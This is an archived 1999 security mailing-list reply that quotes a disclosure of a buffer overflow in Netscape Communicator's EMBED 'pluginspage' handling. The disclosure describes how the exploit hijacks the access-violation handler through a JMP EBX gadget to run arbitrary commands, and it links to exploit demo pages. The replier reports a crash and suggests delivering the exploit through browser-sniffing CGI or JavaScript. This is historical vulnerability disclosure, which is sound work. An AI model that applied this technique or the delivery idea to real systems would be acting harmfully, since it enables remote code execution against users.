I tried the URL for the notepad.exe on a Windows 95 (4.00.950a) machine, Pentium II 266 w/ 56 MB of RAM, using Netscape Communicator 4.05 Preview Release 1 (AWT 1.1.5) even though these are coded for Win98. When I went there with NC 4.05, it gave me a blue screen of death that was completely unrecoverable. I had to reboot the system. So, basically, it is a DoS for Netscape users, could possibly be coded into a CGI or Javascript that checks browser version and writes the corresponding exploit code. Just a thought. -Kerb On Thursday, September 02, 1999 9:46 AM, DEF CON ZERO WINDOW [SMTP:defcon0at_private] wrote: : Hi, : : I discovered a buffer overflow bug which causes huge security hole on the : `Netscape communicator 4.06J, 4.5J - 4.6J, 4.61e( probably, a version 3.0 : after all )'. : : The problem of this application is in the handling of EMBED TAG, the buffer : overflow is caused if the long string is specified at "pluginspage" option. : I coded the exploit program to execute any command on the victim machine. I : tested on the Windows98. : : However, this program specifies immediately the address of the system() : function which is defined on the msvcrt.dll, this program does not work on : the Windows machine which is installed the other version of msvcrt.dll (This : program is for Version 6.00.8397). : : The reason that I specified the immediate address of the function is the : buffer which can be written the exploit code is very short, the size of : writable buffer is about 83 bytes. The buffer is too small to put the code : which gets the address of the functions which are defined on the : "msvcrt.dll". : : However, this problem will be solved if the code that searchs the attack code : and executes that code is put on the exploit code. The attack code also can : be written on the other buffer. : : # An attack code could be written in 2300 bytes to stack_bottom. : : The trojan or virus can be written on the attack code, this problem is very : serious. : : In this case, the stack pointer (ESP) when the overflow is caused differs by : the environment. So, the method of the RET address overwrites can not be used : to exploit. This example overwrites the handling address of the access : violation, the exploit code is called when the access violation is caused. : When the access violation is caused, the address of the exploit buffer is : stored in the EBX register. So, I overwrite the handling address to the code : that the "JMP EBX" instruction is written. : : You can quickly test this exploit on my site. I have prepared some versions : of exploits that execute "welcome.exe" on your Windows98 machine. If you are : user of the specified version of netscape, please test. I did not code the : exploit program for the WindowsNT and Windows95, but they also contain same : problem. : : .. and, This problem can't be avoided. : : : [ exploit demo page ] : : exec "welcome.exe" - nc4x_ex.c : http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex.cgi : : exec "notepad.exe" : http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex2.cgi : : --- : : [ exploit test ] : : blue screen(int 01h) : http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_bs01.htm : http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_bs01.htm : : : [ document(japanese) ] : http://www.ugtop.com/defcon0/hc/nc4x_ex_demo.htm : : : special thanks: : UNYUN( The Shadow Penguin Security ) : http://shadowpenguin.backsection.net/ : : : : -- : : R00t Zer0 - http://www.ugtop.com/defcon0/index.htm : : : E-Mail: defcon0at_private : : : -- -- : : : "HP/UX is the worst OS for the hacker..." - Mark Abene :
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:01:52 PDT